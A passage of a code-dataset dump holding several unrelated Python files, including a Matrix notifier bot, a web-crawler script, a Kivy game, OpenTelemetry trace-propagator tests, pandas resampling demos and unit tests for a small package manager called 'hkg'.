open(config_file, \"w\") as f:\n json.dump(\n {\n \"home_server\": home_server,\n \"user_id\": resp.user_id,\n \"device_id\": resp.device_id,\n \"access_token\": resp.access_token,\n },\n f,\n )\n\n\nasync def login() -> AsyncClient:\n bot_name = configfile.bot_name\n bot_pass = configfile.bot_pass\n home_server = configfile.home_server\n device_name = configfile.device_name\n\n bot_config = AsyncClientConfig(\n store_sync_tokens=True,\n encryption_enabled=True,\n )\n\n if not os.path.exists(config_file):\n\n if not (home_server.startswith(\"https://\") or home_server.startswith(\"http://\")):\n home_server = \"https://\" + home_server\n\n if not os.path.exists(store_path):\n os.mkdir(store_path)\n\n client = AsyncClient(\n homeserver=home_server,\n user=bot_name,\n store_path=store_path,\n config=bot_config,\n )\n\n resp = await client.login(password=bot_pass, device_name=device_name)\n\n if isinstance(resp, LoginResponse):\n await write_details_to_disk(resp, home_server)\n message = \"Logged in via password.\"\n else:\n logger.error(f'homeserver = \"{home_server}\"; user = \"{bot_name}\"')\n logger.error(f\"Failed to log in: {resp}\")\n logger.error(f\"Trying to register...\")\n\n resp = await client.register(username=bot_name, password=bot_pass, device_name=device_name)\n message = \"Registered using specified credentials.\"\n\n if not isinstance(resp, LoginResponse):\n logger.critical(f'homeserver = \"{home_server}\"; user = \"{bot_name}\"')\n logger.critical(f\"Failed to register: {resp}\")\n quit(1)\n\n logger.info(message)\n\n else:\n with open(config_file, \"r\") as f:\n config = json.load(f)\n client = AsyncClient(\n config[\"home_server\"],\n config[\"user_id\"],\n device_id=config[\"device_id\"],\n store_path=store_path,\n config=bot_config,\n )\n\n client.restore_login(\n user_id=config[\"user_id\"],\n device_id=config[\"device_id\"],\n access_token=config[\"access_token\"],\n )\n logger.info(\"Logged in via access token\")\n\n return client\n\n\nasync def sync_forever(client: AsyncClient, timeout, full_state):\n while True:\n try:\n logger.info(\"Resyncing with matrix\")\n for room_id in client.rooms.keys():\n members = await client.joined_members(room_id=room_id)\n if len(members.members) < 2:\n await client.room_leave(room_id)\n await client.sync(timeout=timeout, full_state=full_state,)\n except (ClientConnectionError, ServerDisconnectedError):\n logger.warning(\"Unable to connect to homeserver, retrying in 15s...\")\n await sleep(15)\n finally:\n await client.close()\n","repo_name":"NLion74/Matrix-Notifier","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73810900649","text":"# -*- coding:utf-8 -*-\r\n################################################################################\r\n#\r\n# Copyright (c) 2015 Baidu.com, Inc. All Rights Reserved\r\n#\r\n################################################################################\r\n'''\r\nCreated on 2015年3月3日\r\n\r\n@author: wanhao01\r\n'''\r\n\r\nimport argparse\r\nimport os\r\nimport sys\r\n\r\nfrom crawler.minispider import logerror, SpiderConfigParser\r\nfrom crawler.minispider import loginfo\r\nfrom crawler.minispider.SpiderConfigParser import NoConfigError\r\nfrom crawler.minispider.SpiderConfigParser import SpiderConfig\r\nfrom crawler.minispider.SpiderHandler import Spiderhandler\r\n\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\nparser = argparse.ArgumentParser(prog='mini_spider.py',\r\n description = 'mini_spider.py,using the BFS,to save the ' + \r\n 'web page matching the specific pattern to local',\r\n epilog='bug reports:\\n mail: wanhao01@baidu.com',\r\n formatter_class=argparse.RawTextHelpFormatter)\r\n\r\nparser.add_argument('-v',\r\n '--version',\r\n action='store_true',\r\n dest='version',\r\n default=False,\r\n help='show version')\r\n\r\nparser.add_argument('-c',\r\n '--config',\r\n dest='config',\r\n default=False,\r\n help=\"specify the config file\")\r\n\r\noptions, _ = parser.parse_known_args()\r\nargs = parser.parse_args()\r\n\r\ndef initConfig():\r\n '''\r\n initialize the configuration file.\r\n '''\r\n configName = \"spider.conf\"\r\n if args.config:\r\n configName = args.config\r\n loginfo(configName) \r\n spiderConfig = SpiderConfig(configName)\r\n try:\r\n spiderConfig.loadConfigFile()\r\n except NoConfigError as error:\r\n logerror(str(error))\r\n logerror(str(type(error)) + ',' + error.message + \r\n ', the program will be exit, please check the config file.')\r\n return \r\n return spiderConfig\r\n\r\n\r\ndef crawl():\r\n '''\r\n encapsulate the logic.\r\n crawling using the specific configuration.\r\n '''\r\n config = initConfig()\r\n max_depth = config.getMaxDepth()\r\n handler = Spiderhandler()\r\n \r\n folder = config.getUrlListFile()\r\n for root, dirs, files in os.walk(folder):\r\n for f in files:\r\n print(root + os.sep + f)\r\n file_read = open(root + os.sep + f, 'r')\r\n urls = file_read.readlines()\r\n \r\n handler.crawl_urls(urls, config, config.getMaxDepth())\r\n \r\n\r\n\r\ndef main():\r\n '''\r\n the main function.\r\n '''\r\n crawl()\r\n print('finished')\r\n","repo_name":"onehao/opensource","sub_path":"pyml/crawler/minispider/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71043283047","text":"from kivy.app import App\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, StringProperty\nfrom kivy.vector import Vector\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color\nfrom kivy.animation import Animation\nfrom kivy.uix.button import Button\n\nfrom random import randint\n\nclass Character(Widget):\n\tdieCount = NumericProperty(None)\n\thealth = NumericProperty(None)\n\n\tdef create(self, createHealth):\n\t\tself.health = createHealth\n\t\n\tdef take_damage(self, damage):\n\t\tself.health -= damage\n\nclass HealthDisplay(Widget):\n\tcurHealth = NumericProperty(100)\n\tmaxHealth = NumericProperty(100)\n\n\tdef animate(self, instance):\n\t\t#self.curHealth += 10\n\t\t#anim = Animation(self.size(self.curHealth,50))\n\t\tanim = Animation(size(self.curHealth,50))\n\t\tanim.start(instance)\n\n\nclass CombatGame(Widget):\n\t#2 players\n\tplayer1 = ObjectProperty(None)\n\tplayer2 = ObjectProperty(None)\n\tplayer1HealthBar = ObjectProperty(None)\n\tplayer2HealthBar = ObjectProperty(None)\n\t\n\tdef initialize(self):\n\t\tself.player1.health=200\n\t\tself.player2.health=200\n\t\tbutton = Button(size_hint=(None, None), text='plop', on_press=self.update())\n\t\treturn button\n\t\t\n\t#def update(self, dt):\n\tdef update(self):\n\t\tself.player1HealthBar.animate\n\t\tself.player2HealthBar.animate\n\t\tself.player1.take_damage(10)\n\t\tself.player2.take_damage(3)\n\t\tself.player1HealthBar.curHealth=self.player1.health\n\t\tself.player2HealthBar.curHealth=self.player2.health\n\n\nclass CombatApp(App):\n\tdef build(self):\n\t\tgame = CombatGame()\n\t\tgame.initialize()\n\t\t#Clock.schedule_interval(game.update, 1.0/60.0)\n\t\treturn game\n\nif __name__ == '__main__':\n\tCombatApp().run()","repo_name":"Beweeted/CombatSimulator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27925039274","text":"import unittest\n\nimport opentelemetry.trace as trace\nfrom opentelemetry.context import get_current\nfrom opentelemetry.context.context import Context\nfrom opentelemetry.propagators.cloud_trace_propagator import (\n _TRACE_CONTEXT_HEADER_NAME,\n CloudTraceFormatPropagator,\n)\nfrom opentelemetry.propagators.textmap import default_getter\nfrom opentelemetry.trace.span import (\n INVALID_SPAN_ID,\n INVALID_TRACE_ID,\n SpanContext,\n TraceFlags,\n format_trace_id,\n)\n\n\nclass TestCloudTraceFormatPropagator(unittest.TestCase):\n def setUp(self):\n self.propagator = CloudTraceFormatPropagator()\n self.valid_trace_id = 281017822499060589596062859815111849546\n self.valid_span_id = 17725314949316355921\n self.too_long_id = 111111111111111111111111111111111111111111111\n\n def _extract(self, header_value):\n \"\"\"Test helper\"\"\"\n header = {_TRACE_CONTEXT_HEADER_NAME: [header_value]}\n new_context = self.propagator.extract(\n carrier=header, getter=default_getter\n )\n return new_context\n\n def _extract_span_context(self, header_value):\n \"\"\"Test helper\"\"\"\n return trace.get_current_span(\n self._extract(header_value)\n ).get_span_context()\n\n def _inject(self, span=None):\n \"\"\"Test helper\"\"\"\n ctx = get_current()\n if span is not None:\n ctx = trace.set_span_in_context(span, ctx)\n output = {}\n self.propagator.inject(output, context=ctx)\n return output.get(_TRACE_CONTEXT_HEADER_NAME)\n\n def _assert_failed_to_extract(self, new_context: Context):\n self.assertEqual(new_context, Context())\n self.assertEqual(\n trace.get_current_span(new_context).get_span_context(),\n trace.INVALID_SPAN.get_span_context(),\n )\n\n def test_no_context_header(self):\n headers = {}\n new_context = self.propagator.extract(\n carrier=headers, getter=default_getter\n )\n self._assert_failed_to_extract(new_context)\n\n def test_empty_context_header(self):\n header = \"\"\n new_context = self._extract(header)\n self._assert_failed_to_extract(new_context)\n\n def test_valid_header(self):\n header = \"{}/{};o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(1))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{};o=10\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(10))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{};o=0\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(0))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{};o=0\".format(format_trace_id(self.valid_trace_id), 345)\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, 345)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(0))\n self.assertTrue(new_span_context.is_remote)\n\n header = \"{}/{}\".format(format_trace_id(self.valid_trace_id), 345)\n new_span_context = self._extract_span_context(header)\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, 345)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(0))\n self.assertTrue(new_span_context.is_remote)\n\n def test_mixed_case_header_key(self):\n header_value = \"{}/{};o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n\n for header_key in (\n \"X-Cloud-Trace-Context\",\n \"X-ClOuD-tRace-ConTeXt\",\n \"X-CLOUD-TRACE-CONTEXT\",\n ):\n header_map = {header_key: [header_value]}\n new_context = self.propagator.extract(\n carrier=header_map, getter=default_getter\n )\n new_span_context = trace.get_current_span(\n new_context\n ).get_span_context()\n self.assertEqual(new_span_context.trace_id, self.valid_trace_id)\n self.assertEqual(new_span_context.span_id, self.valid_span_id)\n self.assertEqual(new_span_context.trace_flags, TraceFlags(1))\n self.assertTrue(new_span_context.is_remote)\n\n def test_invalid_header_format(self):\n header = \"invalid_header\"\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o=\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"extra_chars/{}/{};o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{}extra_chars;o=1\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o=1extra_chars\".format(\n format_trace_id(self.valid_trace_id), self.valid_span_id\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/;o=1\".format(format_trace_id(self.valid_trace_id))\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"/{};o=1\".format(self.valid_span_id)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\"123\", \"34\", \"4\")\n self._assert_failed_to_extract(self._extract(header))\n\n def test_invalid_trace_id(self):\n header = \"{}/{};o={}\".format(INVALID_TRACE_ID, self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\"0\" * 32, self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"0/{};o={}\".format(self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"234/{};o={}\".format(self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(self.too_long_id, self.valid_span_id, 1)\n self._assert_failed_to_extract(self._extract(header))\n\n def test_invalid_span_id(self):\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), INVALID_SPAN_ID, 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), \"0\" * 16, 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), \"0\", 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n header = \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id), self.too_long_id, 1\n )\n self._assert_failed_to_extract(self._extract(header))\n\n def test_inject_with_no_context(self):\n output = self._inject()\n self.assertIsNone(output)\n\n def test_inject_with_invalid_context(self):\n output = self._inject(trace.INVALID_SPAN)\n self.assertIsNone(output)\n\n def test_inject_with_valid_context(self):\n span_context = SpanContext(\n trace_id=self.valid_trace_id,\n span_id=self.valid_span_id,\n is_remote=True,\n trace_flags=TraceFlags(1),\n )\n output = self._inject(trace.NonRecordingSpan(span_context))\n self.assertEqual(\n output,\n \"{}/{};o={}\".format(\n format_trace_id(self.valid_trace_id),\n self.valid_span_id,\n 1,\n ),\n )\n","repo_name":"GoogleCloudPlatform/opentelemetry-operations-python","sub_path":"opentelemetry-propagator-gcp/tests/test_cloud_trace_propagator.py","file_name":"test_cloud_trace_propagator.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"13138614950","text":"# Escriba un programa para imprimir el Triángulo de Floyd.\n# 1\n# 01\n# 101\n# 0101\n# 10101\n\nn=int(input(\"Ingrese un número \"))\nfor i in range(1,n+1):\n fila = \"\"\n for j in range(1,i+1):\n if(i+j) % 2 == 0:\n fila += \"1\"\n else:\n fila += \"0\"\n print(fila)\n","repo_name":"marcoaugusto14/Loops","sub_path":"4_triang_floyd.py","file_name":"4_triang_floyd.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24866407050","text":"#-*- encoding: utf-8 -*-\n\n####### usage:\n####### cat xml | python validate.py\n\nfrom lxml import etree\nimport sys\n\ndtd = etree.DTD(open('experimental/lmpd.dtd'))\n\nroot = etree.XML(sys.stdin.read())\n\nv = dtd.validate(root)\n\nprint('Validate: %s' % v)\n\nif not v :\n print(dtd.error_log.filter_from_errors()[0])\n","repo_name":"HWP-ai/DTD","sub_path":"lmp/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39529758517","text":"#test_resampling.py\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\npd.options.display.float_format = '{:,.3f}'.format\r\ndr = pd.date_range('2020-03-01', periods=31, freq='D')\r\ndf = pd.DataFrame(np.sqrt(np.arange(len(dr))), index=dr,\r\n columns=['A'])\r\ndf_ = df\r\ndf_['index'] = df.index\r\ndf1 = df.resample('W-FRI').mean()\r\ndf_['resample:W-FRI_mean'] = df1\r\ndf4 = df1.resample('D').bfill() # upsampled daily\r\ndf_['upsample:bfill'] = df4\r\ndf5 = df1.resample('D').interpolate(method='linear')\r\ndf_['interp:linear'] = df5\r\ndf6 = df1.resample('D').interpolate(method='polynomial', order=2)\r\ndf_['interp:poly'] = df6\r\nprint(\"\\n df_ =\\n\", df_) \r\nfig, axes = plt.subplots(1,3, tight_layout=True)\r\ndf_[['A','upsample:bfill']].plot(ax=axes[0], fontsize=5) #그림10.4a\r\ndf_.plot.scatter(x='index', y='resample:W-FRI_mean', ax=axes[0])\r\ndf_[['A','interp:linear']].plot(ax=axes[1], fontsize=5) #그림10.4b\r\ndf_.plot.scatter(x='index', y='resample:W-FRI_mean', ax=axes[1])\r\ndf_[['A','interp:poly']].plot(ax=axes[2], fontsize=5) #그림10.4c\r\n# nan을 포함한 df1을 scatter 아닌 plot()을 사용해서도 점형으로 그릴 수 있다.\r\ndf_.plot(x='index', y='resample:W-FRI_mean', kind='scatter', ax=axes[2])\r\nplt.show()\r\n","repo_name":"rangyi22/bwktim","sub_path":"python_for_student/test_resampling.py","file_name":"test_resampling.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38830632829","text":"#!/usr/bin/env python3\n\nimport unittest\nimport os\nimport random\nimport string\n\nfrom hkg_development import hkg\n\n\nclass TestInitAndSetup(unittest.TestCase):\n\n def test_check_if_config_exists(self):\n test_config_path = '/tmp/.config/hkg/settings.conf'\n # Make sure there aren't any config files from previous testing\n if os.path.isfile(test_config_path):\n os.remove(test_config_path)\n # Test to see if correctly return False if file does not exist\n self.assertFalse(hkg.check_config_exists('/tmp'))\n # Make sure the test config directory exists\n os.makedirs(os.path.dirname(test_config_path), exist_ok=True)\n # Create an empty file at expected config path\n open(test_config_path, 'a').close()\n # Test to see if correctly return True if file exists\n self.assertTrue(hkg.check_config_exists('/tmp'))\n os.remove(test_config_path)\n\n def test_can_create_a_default_config(self):\n self.assertTrue(hkg.create_default_config('/tmp'))\n os.remove('/tmp/.config/hkg/settings.conf')\n\n def test_can_load_config_settings(self):\n hkg.create_default_config('/tmp/')\n hkg_config_data = hkg.load_config('/tmp')\n self.assertIn('SOURCES', hkg_config_data)\n self.assertIn('OPTIONS', hkg_config_data)\n os.remove('/tmp/.config/hkg/settings.conf')\n\n def test_add_and_remove_remotes(self):\n\n # Setup\n os.makedirs('/tmp/testhome/.config/hkg', exist_ok=True)\n\n # Test\n self.assertTrue(hkg.create_default_config('/tmp/testhome'))\n self.assertTrue(hkg.check_config_exists('/tmp/testhome'))\n self.assertTrue(hkg.add_repo('/tmp/testhome', 'http://127.0.0.1/tmp/hkg'))\n self.assertTrue(hkg.del_repo('/tmp/testhome', 'http://127.0.0.1/tmp/hkg'))\n self.assertFalse(hkg.del_repo('/tmp/testhome', 'https://sffennel.desktop.amazon.com/packages'))\n\n # Cleanup\n os.remove('/tmp/testhome/.config/hkg/settings.conf')\n os.rmdir('/tmp/testhome/.config/hkg')\n os.rmdir('/tmp/testhome/.config')\n os.rmdir('/tmp/testhome')\n\n def test_list_configured_repos(self):\n\n self.assertTrue(hkg.list_repo('~'))\n\n def test_scan_repo_for_new_packages(self):\n\n # Setup\n os.makedirs('/tmp/testrepo', exist_ok=True)\n hkg.create_repo('/tmp/testrepo')\n\n # Test\n self.assertTrue(hkg.update_repo('/tmp/testrepo'))\n\n # Cleanup\n os.remove('/tmp/testrepo/packages.hdb')\n os.rmdir('/tmp/testrepo')\n\n def test_print_readme(self):\n\n # Setup\n os.makedirs('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib', exist_ok=True)\n tempwrite = open('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib/readme.md', 'w')\n tempwrite.write('This is a readme file.')\n tempwrite.close()\n tempwrite = open('/tmp/readmetest/.local/share/hkg/packages.hdb', 'w')\n tempwrite.write('[INSTALLED]\\nhkg = 0.1\\n[AVAILABLE]\\n\\n')\n tempwrite.close()\n\n # Test\n self.assertTrue(hkg.print_readme('/tmp/readmetest'))\n\n # Cleanup\n os.remove('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib/readme.md')\n os.rmdir('/tmp/readmetest/.local/share/hkg/hkg/hkg/lib/')\n os.rmdir('/tmp/readmetest/.local/share/hkg/hkg/hkg/')\n os.rmdir('/tmp/readmetest/.local/share/hkg/hkg/')\n os.remove('/tmp/readmetest/.local/share/hkg/packages.hdb')\n os.rmdir('/tmp/readmetest/.local/share/hkg/')\n os.rmdir('/tmp/readmetest/.local/share/')\n os.rmdir('/tmp/readmetest/.local/')\n os.rmdir('/tmp/readmetest/')\n\n\nclass TestPackaging(unittest.TestCase):\n\n def test_validate_directory_structure(self):\n # Setup the test directory structure\n os.makedirs('/tmp/testsrc/testsrc/lib', exist_ok=True)\n os.makedirs('/tmp/testsrc/testsrc/etc', exist_ok=True)\n open('/tmp/testsrc/metadata', 'a').close()\n open('/tmp/testsrc/testsrc/program.bin', 'a').close()\n \n # Check simplest possible package is OK\n self.assertTrue(hkg.validate_source_directory('/tmp/testsrc'))\n\n # Should fail since only metadata file should exist in base dir\n open('/tmp/testsrc/bad.file', 'a').close()\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.remove('/tmp/testsrc/bad.file')\n\n # Should fail since only one executable file should exist in source dir\n open('/tmp/testsrc/testsrc/bad.file', 'a').close()\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.remove('/tmp/testsrc/testsrc/bad.file')\n\n # Should pass with files in main/src/lib and main/src/etc\n open('/tmp/testsrc/testsrc/lib/stuff.lib', 'a').close()\n open('/tmp/testsrc/testsrc/etc/settings.conf', 'a').close()\n self.assertTrue(hkg.validate_source_directory('/tmp/testsrc'))\n os.remove('/tmp/testsrc/testsrc/lib/stuff.lib')\n os.remove('/tmp/testsrc/testsrc/etc/settings.conf')\n\n # Should fail since only src dir w/ same name is allowed in main/\n os.makedirs('/tmp/testsrc/stuff', exist_ok=True)\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.rmdir('/tmp/testsrc/stuff')\n\n # Should fail since only bin and etc are valid dirs in main/src/\n os.makedirs('/tmp/testsrc/testsrc/stuff', exist_ok=True)\n self.assertFalse(hkg.validate_source_directory('/tmp/testsrc'))\n os.rmdir('/tmp/testsrc/testsrc/stuff')\n\n # Clean up\n os.remove('/tmp/testsrc/metadata')\n os.remove('/tmp/testsrc/testsrc/program.bin')\n os.rmdir('/tmp/testsrc/testsrc/lib')\n os.rmdir('/tmp/testsrc/testsrc/etc')\n os.rmdir('/tmp/testsrc/testsrc')\n os.rmdir('/tmp/testsrc')\n\n def test_init_new_package_directory(self):\n\n # Make sure the function returns True and that each piece of the skeleton is actually created\n self.assertTrue(hkg.init_package_directory('/tmp/test_package'))\n self.assertTrue(os.path.isdir('/tmp/test_package'))\n self.assertTrue(os.path.isdir('/tmp/test_package/test_package'))\n self.assertTrue(os.path.isdir('/tmp/test_package/test_package/etc'))\n self.assertTrue(os.path.isdir('/tmp/test_package/test_package/lib'))\n self.assertTrue(os.path.isfile('/tmp/test_package/metadata'))\n self.assertTrue(os.path.isfile('/tmp/test_package/test_package/your_program.bin'))\n\n # Cleanup\n os.remove('/tmp/test_package/test_package/your_program.bin')\n os.remove('/tmp/test_package/metadata')\n os.rmdir('/tmp/test_package/test_package/etc')\n os.rmdir('/tmp/test_package/test_package/lib')\n os.rmdir('/tmp/test_package/test_package')\n os.rmdir('/tmp/test_package')\n\n def test_validate_metadata(self):\n \n # Create the test metadata file. We'll manually edit the file's contents instead of using configparser.\n testfile = open('/tmp/metadata', 'w')\n testfile.write('[METADATA]\\n')\n testfile.write('name = spam\\n')\n testfile.write('version = 2.1\\n')\n testfile.write('description = An example package\\n')\n testfile.write('author_name = Eadrom\\n')\n testfile.write('author_email = eadrom@example.com\\n')\n testfile.write('website = http://example.com\\n')\n testfile.close()\n\n # Test\n self.assertTrue(hkg.validate_metadata('/tmp/metadata'))\n\n # Cleanup\n os.remove('/tmp/metadata')\n\n def test_zip_files_to_disk_as_package(self):\n # Create a fake package\n hkg.init_package_directory('/tmp/sources/ziptest')\n open('/tmp/sources/ziptest/ziptest/lib/functions.so', 'a').close()\n open('/tmp/sources/ziptest/ziptest/etc/settings.conf', 'a').close()\n\n # Write some text to the files to give them some content\n tempwrite = open('/tmp/sources/ziptest/ziptest/lib/functions.so', 'a')\n for i in range(25):\n tempwrite.write(''.join(random.choice(string.ascii_letters + string.digits) for _ in range(65)) + '\\n')\n tempwrite.close()\n\n tempwrite = open('/tmp/sources/ziptest/ziptest/etc/settings.conf', 'a')\n for i in range(8):\n tempwrite.write(''.join(random.choice(string.ascii_letters + string.digits) for _ in range(30)) + '\\n')\n tempwrite.close()\n\n tempwrite = open('/tmp/sources/ziptest/ziptest/your_program.bin', 'a')\n for i in range(200):\n tempwrite.write(''.join(random.choice(string.ascii_letters + string.digits) for _ in range(79)) + '\\n')\n tempwrite.close()\n\n self.assertTrue(hkg.create_package('/tmp/sources/ziptest'))\n\n # Clean up\n os.remove('/tmp/sources/ziptest/ziptest/your_program.bin')\n os.remove('/tmp/sources/ziptest/metadata')\n os.remove('/tmp/sources/ziptest/ziptest/lib/functions.so')\n os.remove('/tmp/sources/ziptest/ziptest/etc/settings.conf')\n os.rmdir('/tmp/sources/ziptest/ziptest/etc')\n os.rmdir('/tmp/sources/ziptest/ziptest/lib')\n os.rmdir('/tmp/sources/ziptest/ziptest')\n os.rmdir('/tmp/sources/ziptest')\n os.remove('/tmp/sources/ziptest.hkg')\n os.rmdir('/tmp/sources')\n\n def test_init_package_database(self):\n\n # Test just providing a target directory.\n self.assertTrue(hkg.init_package_database('/tmp/'))\n self.assertTrue(os.path.isfile('/tmp/packages.hdb'))\n os.remove('/tmp/packages.hdb')\n\n # Test providing the entire path for the package database.\n self.assertTrue(hkg.init_package_database('/tmp/packages.hdb'))\n self.assertTrue(os.path.isfile('/tmp/packages.hdb'))\n os.remove('/tmp/packages.hdb')\n\n # Test providing a non correct filename for the package database.\n self.assertTrue(hkg.init_package_database('/tmp/testdb'))\n self.assertTrue(os.path.isfile('/tmp/testdb/packages.hdb'))\n\n # Make sure contents of skeleton database are correct.\n tempread = open('/tmp/testdb/packages.hdb', 'r')\n self.assertTrue(tempread.read() == '[INSTALLED]\\n\\n[AVAILABLE]\\n')\n tempread.close()\n os.remove('/tmp/testdb/packages.hdb')\n os.rmdir('/tmp/testdb')\n\n def test_validate_package_database(self):\n\n # Setup\n if os.path.isfile('/tmp/test.hdb'):\n os.remove('/tmp/test.hdb')\n tempwrite = open('/tmp/test.hdb', 'a')\n tempwrite.write('[INSTALLED]\\n')\n tempwrite.write('scripta = 1.1\\n')\n tempwrite.write('\\n')\n tempwrite.write('[AVAILABLE]\\n')\n tempwrite.write('scripta = 1.1\\n')\n tempwrite.write('dostuff = 2.4\\n')\n tempwrite.close()\n\n # Test\n self.assertTrue(hkg.validate_package_database('/tmp/test.hdb'))\n\n # Cleanup\n os.remove('/tmp/test.hdb')\n\n def test_update_package_database(self):\n\n # Setup\n if os.path.isfile('/tmp/test.hdb'):\n os.remove('/tmp/test.hdb')\n tempwrite = open('/tmp/test.hdb', 'a')\n tempwrite.write('[INSTALLED]\\n')\n tempwrite.write('scripta = 1.1\\n')\n tempwrite.write('\\n')\n tempwrite.write('[AVAILABLE]\\n')\n tempwrite.write('scripta = 1.1\\n')\n tempwrite.write('dostuff = 2.4\\n')\n tempwrite.close()\n\n # Test\n self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'update', 'AVAILABLE', 'scripta', '1.2'))\n self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'create', 'AVAILABLE', 'scriptz', '2.6'))\n self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'delete', 'AVAILABLE', 'scripta', '0'))\n self.assertFalse(hkg.package_database_api('/tmp/test.hdb', 'add', 'INSTALLED', 'stuffthing', '1.0'))\n self.assertTrue(hkg.package_database_api('/tmp/test.hdb', 'check', 'INSTALLED', 'scripta', '0'))\n self.assertFalse(hkg.package_database_api('/tmp/test.hdb', 'check', 'INSTALLED', 'blah', '0'))\n self.assertEquals(hkg.package_database_api('/tmp/test.hdb', 'version', 'AVAILABLE', 'dostuff', '0'), '2.4')\n\n # Cleanup\n os.remove('/tmp/test.hdb')\n\n def test_create_repository(self):\n\n # Setup\n os.makedirs('/tmp/testrepo', exist_ok=True)\n\n # Test\n self.assertTrue(hkg.create_repo('/tmp/testrepo'))\n self.assertTrue(os.path.isfile('/tmp/testrepo/packages.hdb'))\n self.assertTrue(hkg.validate_package_database('/tmp/testrepo/packages.hdb'))\n\n # Cleanup\n os.remove('/tmp/testrepo/packages.hdb')\n os.rmdir('/tmp/testrepo')\n\n\nclass TestInstallPackage(unittest.TestCase):\n\n # Might implement hash verification at some point\n def test_validate_package_file(self):\n \n pass\n\n def test_prep_findpkg_download_extract_makesymlink(self):\n\n # Test\n self.assertTrue(hkg.install_package('hkghello', ''))\n self.assertTrue(os.path.isfile(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/hkghello.sh')))\n self.assertTrue(os.path.isdir(os.path.expanduser('~/.cache/hkg')))\n self.assertTrue(os.path.isdir(os.path.expanduser('~/.local/share/hkg')))\n self.assertTrue(os.path.isdir(os.path.expanduser('~/bin')))\n self.assertTrue(os.path.isfile(os.path.expanduser('~/.cache/hkg/hkghello.hkg')))\n self.assertTrue(os.path.isfile(os.path.expanduser('~/bin/hkghello')))\n self.assertFalse(hkg.install_package('hkghello', ''))\n\n # Cleanup\n 